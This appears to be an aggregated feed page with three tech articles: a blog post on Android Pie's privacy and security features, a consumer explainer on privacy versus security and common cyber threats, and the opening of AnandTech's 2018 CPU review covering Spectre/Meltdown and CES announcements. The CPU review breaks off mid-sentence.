The new security features in Android Pie and why I’m excited about them

Apps will only be able to use your mic or camera if they are actively being used on screen. If you have any paranoia about some apps listening to you, you can be sure that no apps can listen to you secretly with Android Pie.

While this move prevents apps from listening to your conversations, Google will still be able to listen to you. ‘OK Google.’ :wink:

BTW no app will be able to use any other sensors besides the mic and camera.

New lockdownmode
The new security features in Android Pie and why I’m excited about them

When the fingerprint authentication was first introduced, it helped everyone. Do you know how many times an average human authenticates their mobile phone in a day? Yeah. Too many.

Here comes the trouble: there are many stories about how police or people with bad intentions could force you to unlock your phone with your fingerprint to search it. Anyone could force you to unlock your phone with your face id to gain access to your digital life (nowadays it’s your actual life).

You can disable fingerprint and face authentication in Android Pie by enabling the lockdown mode. Only your PIN, pattern, or password will work when it’s enabled. However, this feature will not be needed in your casual life. It’s just good to have for higher-risk situations.

HTTPS is the default forapps

Today most people are aware that websites which have a green locked key are secure enough to enter. You can search for that key in your browser. However, you can not know if the app you use makes calls to HTTPS services.

Any regular app sends data over the Internet. Any bad person may read this data you send unless it is encrypted. HTTPS guarantees that the transaction is encrypted. Android will force developers to send data over HTTPS to make sure that the data sent from your phone will be encrypted.

Restoring your device will require apasscode
The new security features in Android Pie and why I’m excited about them

With Android Pie, you will restore your device using your PIN or pattern or password. Fingerprint or face id has been enough to restore the device so far. However, this simplicity came with some vulnerability. A second auth layer has been introduced to restore your device more securely. Be aware that if you forget the PIN, you will not be able to restore your device.

The alert tone when your call is beingrecorded

There are many apps which can record calls. It has been a big vulnerability so far. There are two cases: any app can record your call, or someone you’re talking to can record the call.

Now if you record a call, an alert tone will be sent periodically to you and to the person you’re talking to. Android Pie ends this paranoia permanently.

I’ve tried to introduce significant new improvements in Android Pie with this post. While there are many more enhancements, these were the ones I found most important. Android Pie will be the most secure Android version ever.

Privacy & Security What Is the Difference?

$
0
0

Privacy &amp; Security What Is the Difference?

When we discuss the internet today, there are two terms that we frequently here: privacy and security. While you may think that these two terms mean the same thing and are thus interchangeable, this isn’t true. As such, you’ll want to take a moment to learn the difference between these two terms.

Understanding the Difference Between Privacy and Security

When you open a checking account you share your personal information with your bank. There are three results that may occur here:

The bank may maintain your privacy and security. Your privacy may be compromised, but still, your security could be maintained. This means that the bank might sell some of your information to a marketer something you may agree to in the bank’s privacy disclosure. The result is that your personal information ends up in the hands of people you didn’t want to have it. Both your privacy and your security are compromised by a data breach. Herein cybercriminals penetrate the bank’s database, compromising your security. When this happens, your information could be sold on the dark web, causing you problems with cyber fraud and identity theft.

Norton says cybersecurity products can provide both your privacy and security though. Sometimes the software can even protect both at the same time as is the case when you use a virtual private network (VPN). This is a security product that encrypts all the data you send or receive while online. Essentially, this is like sitting with your back to the wall so someone can’t look over your shoulder and see what you’re doing. There are two main ways in which this is beneficial to you:

Privacy: A VPN helps block websites, internet browsers, cable companies, and internet service providers (ISP) from tracking your personal information, including your web browser history. Security: A VPN will help protect you when others attempt to access your personal information online. What we Need Security Against

Understanding the difference between security and privacy is the first step, but it may leave you wondering: What do we need security against? According to Trip Wire, while there are hundreds of cyber threats we should take strict security measures against, the primary ones include:

Malicious software (a.k.a. malware) is one of the cybercriminals’ most effective weapons. They use it to infiltrate a target system or device. Once inside, the cybercriminal can steal your information, damage your system, modify or delete data, or create any other type of harm they want. The number of malware variants grows by leaps and bounds each year because this is such an effective weapon in the hands of cybercriminals. In fact, today this is the most common type of tool they deploy. Distributed denial-of-service attacks (a.k.a. DDoS) are used to paralyze your computer so that you can’t access it. This is done by creating a malicious botnet that infects any vulnerable systems that are on either a node or a network. Once deployed the cyber attacker will then order the botnet to continually send requests which the server can’t manage because there are simply too many of them. As such, the server is forced to go offline. One of the best-known examples of this happened in 2016. At that time Dyn (a well-known DNS provider) was hit by one of history’s largest DDoS attacks . Cyber attackers hit them at a rate of 1.2 terabits per second. Phishing is one of the oldest, yet most effective ways a cybercriminal can lure in their victim. It most commonly happens when you receive a fake email, but bogus websites and text messages are also being used today. The main goal of these attacks is to steal your personal and financial information. To date, these have been very successful, costing mid-size companies an estimated $1.6 million. Ransomware is one of the most sophisticated types of malware in existence today. Cybercriminals can use it to restrict your access to your personal information. While this may sound complicated, it’s as easy as being forced to pay a ransom demand if you want to regain access to your own personal information. The most common way cybercriminals can affect a target system is through a phishing attack. By 2019 most cybersecurity experts believe that ransomware damages will cost around $11.5 billion. Top Preventive Measures for Privacy and Security

You should only trust businesses or services who value your privacy. They can demonstrate this respect to you by using state-of-the-art technology to protect your private information. Of course, you must also take the time to understand the difference between security and privacy. Obviously, this won’t do you any good unless you employ some precautionary tactics like threat intelligence software to protect your privacy and prevent security breaches from happening. With this in mind, here are some of these steps that you can start using today:

Although it’s common to share your personal information on social media today, this puts your privacy at serious risk. This is why it’s so important to make sure that you don’t disclose everything about yourself online or even offline. You should also take a moment to make sure that the privacy on your social profiles is set to “private.” Don’t click on links inside of emails that come from unknown recipients. These are typically phishing attacks, which means they contain malicious links. Make sure that all your devices are protected so it’s difficult for cybercriminals to penetrate its security walls where, once inside, they’re able to infect your device with malicious tools. You should also consider using a VPN. These encrypted servers make it almost impossible for a cybercriminal to steal your private information even when a device becomes compromised. Don’t connect to public WiFi. These are known to lack security measures that make them more prone to security breaches. Always read the TOS and privacy policy when you buy a product or subscribe to a service online. This will tell you what information they’re collecting and how they’re using it. If you’re in Europe

AnandTech Year in Review 2018: CPUs

$
0
0

When Ryan initially asked me to write a roundup of the year’s news on CPUs, I laughed. There has been a lot going on this year, from processor releases and reviews, to security issues, to discussions about the next few years of computing. However a couple of weeks ago I wrote a script to pull every AnandTech article out of our archive to filter into my own database for analysis. It turns out that the AT staff between us have written just shy of 200 news articles and longer format reviews about CPUs this year, and here are the highlights.

When discussing CPUs, at least the desktop market, our attention focuses to two companies in particular: Intel and AMD.

January: Security and CES

The start of the year typically begins with the big CES trade show in Las Vegas, but before we event got to that point, news broke about two new classifications of vulnerabilities affecting most modern processors:Spectre and Meltdown. This was significant as these two names signified a new family of microarchitectural vulnerabilities derived from the base design of modern processors, exploiting some of the tricks used for how we get a lot of speedup in common day-to-day tasks. The news broke about a week earlier than the companies intended (part of the term responsible disclosure), but the big players having around six month’s notice to put forward fixes after Google’s Project Zero first discovered them in 2017. These vulnerabilities were a common thread through 2018 (and still are today), ascompanies put forward a mix of software and firmware fixes for hardware in the wild, built security assurance teams , and put research towards hardware fixes for future products. Essentially every high-performance processor ever made Intel , AMD , ARM , and POWER is thought to be vulnerable at some level, and every major company made official statements on the issue. Software and firmware fixes for several generations of processors came out through 2018 , and new products that block ‘some’ of these attacks came out in thelatter stage of 2018,although 2019 is where it gets more serious. Some of these fixes causeperformance regression in certain tasks, mostly enterprise based, however this is a topic that will also be at the forefront of every 2019-2020 CPU launch.


AnandTech Year in Review 2018: CPUs

Not to be outdone by security news, the CES trade show was one of our busiest ever. AMD kicked off proceedings with a full day of discussions, keynotes, and disclosures . The key to AMD’s presentation is that the new Zen microarchitecture products, Ryzen and EPYC, were paving the way for the future. In the presentations, AMD presented roadmaps for product launches in 2018, includingnew APUs, a new range of desktop processors on 12nm with Zen+ updates , second generation Threadripper on the high end, and a push towards 7nm Vega GPUs at the end of the year. This was a very well put together presentation from AMD, showing that they have roadmaps and they are willing to commit. On top of this, AMD reiterated its long term roadmap on CPU and GPU technologies, going through 2020.


AnandTech Year in Review 2018: CPUs

One key highlight here was our interview with AMD’s CEO, Dr. Lisa Su , on how AMD is set to approach its new era.

Intel had itsusual keynote at CES, hosted by now former CEO Brian Krzanich, which addressed the security issues briefly, spoke mostly about drones and connecting people, but made no mention of the company’s progress on its next generation process technology at 10nm. Instead, the company mentioned 10nm very briefly at the end of a small 9 minute presentation at the Intel booth the next morning, at 8am, through Gregory Bryant, the SVP of the Client Computing Group. The news wasn’t that great: Intel confirmed it had shipped 10nm in 2017 for revenue. It was literally that short of a sentence. No word on how the technology was progressing, or any future timelines.


AnandTech Year in Review 2018: CPUs

There was some upside for Intel in January however. The company launched its best performing integrated graphics solution ever: the Core with Radeon RX Vega Graphics set of SoCs. These processors took quad-core mobile chips and paired them with a custom Polaris graphics solution from AMD all on the same processor package. The graphics chip was connected with Intel’s EMIB technology to a stack of HBM2 memory, keeping the package small. The offerings ranged from 65W to 100W TDP, and the goal here was to provide something just below discrete graphics solutions in a thin and light form factor. We saw theHP Spectre x360 andDell XPS 15 both updated with these options, as well as aHades Canyon NUC, aChuwi HiGame mini-PC, and aDell Precision device later in the year.

February: Visiting GlobalFoundries

Transitioning from January to February is usually a slow time in the industry as Chinese New Year sets in. Depending on the company, this can be anything from a one week break to a three week break, so we don’t tend to see many product launches at the end of January/beginning of February unless the factories have enough stock, or the fabs chain doesn’t involve China.

Intel kicked off the month with a reactionary measure to the Spectre and Meltdown issues by formally announcing the creation of the
Viewing all 12749 articles
Browse latest View live